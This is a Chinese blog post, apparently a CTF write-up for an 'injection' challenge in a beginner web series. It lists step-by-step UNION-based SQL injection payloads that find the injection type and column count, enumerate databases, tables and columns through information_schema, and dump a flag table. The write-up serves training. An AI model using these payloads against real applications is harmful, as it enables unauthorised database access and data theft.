NU1LCTFer的成长之路-web入门-CTF中的sql注入-injection-wp

居上7788

于 2021-06-28 21:56:29 发布

阅读量177

点赞数

CC 4.0 BY-SA版权

分类专栏： ctf记录

><本博客上原创文章未经本人许可，不得用于商业用途。转载请注明出处，否则保留追究法律责任的权利。><

本文链接：https://blog.youkuaiyun.com/weixin_46439278/article/details/118313280

ctf记录专栏收录该内容

78 篇文章

订阅专栏

本文详细介绍了一种常见的Web安全漏洞——SQL注入攻击的具体步骤。从判断注入类型开始，逐步介绍了如何确定列数、是否存在联合查询注入、如何查询数据库及表结构等关键信息。最终通过实例演示了如何利用SQL注入获取敏感数据。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

injection

主页是这个样子

判断注入类型数字型

id=1 and 1=1#
id=1 and 1=2#

判断列数两列

id=1 order by 2#

查询是否有显示位 union联合查询注入 2号位

id=1 union select 1,2#

查询数据库 ctfhub、informaion_schema

id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 0,1)#

id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 1,1)#

查询表（ctfhub） flag、info、

id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 0,1)#

id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 1,1)#

查询字段（flag） flag

id=1 union select 1,(select concat(column_name) from information_schema.columns where table_name='flag' limit 0,1)#

dump数据

id=1 union select 1,(select flag from flag)#